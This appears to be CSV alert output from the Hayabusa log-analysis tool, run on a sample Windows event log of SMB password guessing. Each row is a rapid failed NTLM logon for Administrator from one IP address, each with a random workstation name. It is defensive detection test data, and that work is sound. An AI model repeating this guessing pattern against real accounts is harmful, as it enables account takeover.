2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AJVD4uVhwfLSJ6Ab  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q6KME1I6tE0v9UAq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1Qtt1rk4n3tOJko2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: prPsA8EZHGfGPSHm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TQqGXnwHtB87LSzT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6uLT1bjaIS0XBsWC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PIgpraQTxFrcLphN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q1D6qy57XImq4prx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5Kw44Ffh4DIPlyuM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oKUdmKU74RmJysAx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gZUTzZw0T1tYRSP5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nEOfjuAMa7HTsfcP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e7bG19emMTmyBQNm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YsLkgWukfqS3wWJK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: liFcZjjpY3xXwe9j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vBUgbfzx2OEcOxWL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iVCV0WoZmLTFNH71  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZJmxGOqck4oQi1kL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w7lYqaUvEtTp18DK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yZ9xQmGn61JJDeQS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XuMXpvY9fmLm0eBq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ofesuNErTLWuN0k4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KsNq7SThd3b8oTwF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MmRWg5gNRcxDMFjg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JXrGn6LehVwTGNNj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vIq9DS71jCjWbgdY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kw2BQbdUml0EPNOs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ugOqsKQFGmmLac3s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3rZHUbOUVBYiHarB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: otv8ByrbWWoTz7pi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HVlHkJu4Gxc9dhxM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xKF5OCqLVVKvung0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: avAdpkOlP0xji1vG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VFgzMjEz6M0LBnX7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kdJb0obVAqkY9GCw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6ciSoQcLUgLfzaNg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RECrGCCTJuDPlvYJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1Z2w67uyC2NOgecT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lRVetRdHvz0lJkOC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yXrtxquzyzxKnQgD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pWOoEIEem7Q9Mdx0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 86n5nIm04810NptD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: M08noHtTqqx3pxSe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3P983pRVfCVlVTyA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eMKlcLvRhlx9FMcZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0gwEDgRF2wUgTDAy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I9Q2GSALfiuEbulo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DKTja76Qe9vSjrdN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DXXuUyKlvaOgMNSu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X3qdEQReXwHAZUS8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FqtfHJKOfmWXEd4s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mVv7vete3uXixggi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0PF6E3wRP0Tk39ss  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: touwF4IXUahG7jvJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lMOi7rygc7SJ5TPQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QjM1K5eFSA9U37oE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HgzyZqFU9v2kDVvG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hJeVj2h0sBxwBuGv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FNXI8b6Zcj1zU3JY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q9DyH9oxFbRTCQ80  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5LZo1ljGLOVKhwcC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GvY6Q7RGKwjehARC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uKLrHVMevqniTck8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ldxglvKFhLJQ3FV3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lRHIAxIj9wFRIg67  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mc7nvfyDfWpnhhBx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NB7Y4gPbxose5TsQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yKFU6DJ8Wdtp2qdC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YlbxRctdClWIOjss  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LToi5ANf3tUteu4h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 52YPmYviVPBqJ39Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JpzKsyxEKNLd8l1u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r0vd6xEFevamX3jF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
